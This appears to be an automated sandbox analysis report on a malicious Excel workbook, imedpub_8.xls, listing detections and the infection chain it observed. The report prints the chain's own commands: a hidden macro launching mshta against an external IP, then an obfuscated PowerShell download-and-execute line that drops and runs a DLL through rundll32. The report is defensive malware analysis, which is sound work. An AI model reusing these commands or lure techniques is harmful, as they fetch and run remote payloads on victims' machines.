Source: Screenshot number: 8	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26

Found malicious Excel 4.0 Macro

Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta

Document contains OLE streams with names of living off the land binaries

Source: imedpub_8.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: imedpub_8.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: imedpub_8.xls	Initial sample: EXEC
Source: imedpub_8.xls	Initial sample: EXEC

Yara signature match

Source: imedpub_8.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: 32B4.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found a hidden Excel 4.0 Macro sheet

Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE
Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Document contains embedded VBA macros

Source: imedpub_8.xls	OLE indicator, VBA macros: true
Source: imedpub_8.xls.0.dr	OLE indicator, VBA macros: true

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P. .............................P. .....................`I.........v.....................K......(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k....................................}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k..... ..............................}..v............0...............(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......e.............................}..v............0.................e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k......e.............................}..v....@.......0...............8.e.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0E5.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@9/8@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: imedpub_8.xls	OLE indicator, Workbook stream: true
Source: imedpub_8.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: 32B4.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\mshta.exe

Code function: 4_3_035B30CB push 8B490286h; iretd

4_3_035B30D0

PE file contains an invalid checksum

Source: JooSee.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x935bd

Persistence and Installation Behavior

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 1164

Thread sleep time: -300000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
